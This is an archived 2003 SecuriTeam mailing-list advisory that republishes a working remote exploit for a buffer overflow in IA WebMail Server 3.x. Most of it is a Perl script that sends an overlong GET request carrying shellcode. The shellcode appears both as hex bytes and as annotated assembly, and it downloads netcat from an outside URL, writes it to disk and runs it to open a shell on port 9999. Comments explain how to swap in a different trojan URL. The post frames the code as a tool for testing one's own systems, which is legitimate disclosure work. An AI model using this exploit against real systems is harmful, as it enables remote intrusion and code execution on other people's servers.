[EXPL] IA WebMail Server Buffer Overflow Vulnerability (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 11/19/03
- Previous message: SecuriTeam: "[UNIX] phpWebFileManager Directory Traversal Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 19 Nov 2003 12:05:58 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
IA WebMail Server Buffer Overflow Vulnerability (Exploit)
------------------------------------------------------------------------
SUMMARY
As we reported in our previous article:
<http://www.securiteam.com/windowsntfocus/6B002158UQ.html> IA WebMail
Server Buffer Overflow Vulnerability, an exploitable buffer overflow
exists in the product allowing remote attackers to cause the product to
execute arbitrary code. The following exploit code can be used to test
your system for the mentioned vulnerability.
DETAILS
Exploit:
#!/usr/bin/perl -w
#
# IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
#
# By Peter Winter-Smith peter4020 hotmail.com
# Shellcode included - will need reassembling to use different
# urls and files etc.
#
# Tested against:
# - Windows XP Home SP1
# - Windows 2000 Pro SP4
#
# Shellcode should work each time, since it steals it's addresses
# from the iaregdll.dll module import tables.
# Uses a very static jmp esp in iaregdll.dll - Should work on all
# servers without alteration!
#
# If the remote server is running a firewall, the urldownloader
# will be unable to spawn a shell, so for testing I recommend
# that you close the firewalls, or get another shellcode which
# will deal with this. This exploit is for PoC purposes only :o)
#
# Notes:
# - WebMailsvr.exe exits without consuming 100% resources in most
# cases.
# - This has only been tested with IA WebMail 3.1, however it was
# designed to exploit all versions.
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: iawebmail.pl <victim> <port>\n\n";
exit;
}
$shellcode = "\x90\xEB\x3C\x5F\x55\x89\xE5\x81" .
"\xC4\xE8\xFF\xFF\xFF\x57\x31\xDB" .
"\xB3\x07\xB0\xFF\xFC\xF2\xAE\xFE" .
"\x47\xFF\xFE\xCB\x80\xFB\x01\x75" .
"\xF4\x5F\x57\x8D\x7F\x0B\x57\x8D" .
"\x7F\x13\x57\x8D\x7F\x08\x57\x8D" .
"\x7F\x23\x57\x8D\x7F\x09\x47\x57" .
"\x8D\x54\x24\x14\x52\xEB\x02\xEB" .
"\x52\x89\xD6\xFF\x36\xFF\x15\xDC" .
"\x51\x02\x10\x5A\x52\x8D\x72\xFC" .
"\xFF\x36\x50\xFF\x15\x14\x52\x02" .
"\x10\x5A\x52\x31\xC9\x51\x51\x8D" .
"\x72\xF0\xFF\x36\x8D\x72\xF4\xFF" .
"\x36\x51\xFF\xD0\x5A\x52\xFF\x72" .
"\xEC\xFF\x15\xDC\x51\x02\x10\x5A" .
"\x52\x8D\x72\xF8\xFF\x36\x50\xFF" .
"\x15\x14\x52\x02\x10\x5A\x52\x31" .
"\xC9\x41\x51\x8D\x72\xF0\xFF\x36" .
"\xFF\xD0\xCC\xE8\x6B\xFF\xFF\xFF" .
"\x55\x52\x4C\x4D\x4F\x4E\x2E\x44" .
"\x4C\x4C\xFF\x55\x52\x4C\x44\x6F" .
"\x77\x6E\x6C\x6F\x61\x64\x54\x6F" .
"\x46\x69\x6C\x65\x41\xFF\x57\x69" .
"\x6E\x45\x78\x65\x63\xFF\x68\x74" .
"\x74\x70\x3A\x2F\x2F\x77\x77\x77" .
"\x2E\x65\x6C\x69\x74\x65\x68\x61" .
"\x76\x65\x6E\x2E\x6E\x65\x74\x2F" .
"\x6E\x63\x61\x74\x2E\x65\x78\x65" .
"\xFF\x63\x3A\x5C\x6E\x63\x2E\x65" .
"\x78\x65\xFF\x6B\x65\x72\x6E\x65" .
"\x6C\x33\x32\x2E\x64\x6C\x6C\xFF";
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Unable to connect to $ARGV[0] on port
$ARGV[1]";
$ebp = "BBBB";
$eip = "\x33\xBD\x02\x10";
$exploit = "GET /" . "a"x1036 . $ebp . $eip . $shellcode . "
HTTP/1.1\n\n";
print $victim $exploit;
print " + Malicious GET request sent ...\n";
print " + Wait a moment now, then connect to $ARGV[0] on port 9999.\n";
print "Done.\n";
close($victim);
exit;
#####################################################################
## SHELLCODE #
#####################################################################
# ; IA WebMail 3.x Shellcode (iaregdll.dll version 1.0.0.5)
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; [peter4020@hotmail.com]
# ;
# ; nasmw -fbin -o iashellcode.s iashellcode.asm
#
# bits 32
#
# int3
# jmp short killnull
#
# next:
# pop edi
#
# push ebp
# mov ebp, esp
# add esp, -24
#
# push edi
#
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
#
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
#
# pop edi
#
# push edi ; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi ; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi ; 'WinExec'
# lea edi, [edi+08]
# push edi ; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi ; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi ; 'kernel32.dll'
#
# lea edx, [esp+20]
# push edx
#
# jmp short over
# killnull:
# jmp short data
# over:
#
# mov esi, edx
# push dword [esi]
#
# call [100251DCh] ; LoadLibraryA
#
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
#
# push eax
#
# call [10025214h] ; GetProcAddress(URLMON.DLL, URLDownloadToFileA);
#
# pop edx
# push edx
#
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16] ; file path
# push dword [esi]
# lea esi, [edx-12] ; url
# push dword [esi]
# push ecx
#
# call eax
#
# pop edx
# push edx
#
# push dword [edx-20]
#
# call [100251DCh] ; LoadLibraryA
#
# pop edx
# push edx
#
#
# lea esi, [edx-08]
# push dword [esi] ; 'WinExec'
# push eax ; kernel32.dll handle
#
# call [10025214h] ; GetProcAddress(kernel32.dll, WinExec);
#
# pop edx
# push edx
#
# xor ecx, ecx
# inc ecx
# push ecx
#
# lea esi, [edx-16] ; file path
# push dword [esi]
#
# call eax
#
# int3
#
#
# data:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ; db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ; push edi ; 'http://www.elitehaven.net/ncat.exe'
# ; lea edi, [edi+35]
# ; and make it:
# ; push edi ; 'http://www.site.com/someguy/trojan.exe'
# ; lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
#####################################################################
ADDITIONAL INFORMATION
The information has been provided by <mailto:peter4020@hotmail.com> Peter
Winter-Smith.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] phpWebFileManager Directory Traversal Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- IA WebMail 3.x PoC
... # push ebp ... # lea edi, ... # lea edx, ... # xor
ecx, ecx ... (Bugtraq) - Re: Official release of the Twelve Assembly Lessons
... push(eax); ... mov(eax, esi); ... lea(ecx, this.nums);
... mov(this.count, edx); ... (alt.lang.asm) - [EXPL] Microsoft Color Management Buffer Overflow (MS05-036, Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... .text:73B32146 mov eax, ecx
... ESI points to 'redMatrixColumnTag' data ... "\x55" // push ebp ...
(Securiteam) - [EXPL] WinZip MIME Parsing Buffer Overflow Exploit
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... a vulnerability in WinZip
allows an attacker to ... "\x55" // push ebp ... "\x33\xf6" // xor esi, esi
... (Securiteam) - Re: Fastcode UpperCase B&V 0.2
... push ebx ... test edx, edx ... mov edx, [edi] ...
sub ebx, 1 ... (borland.public.delphi.language.basm)
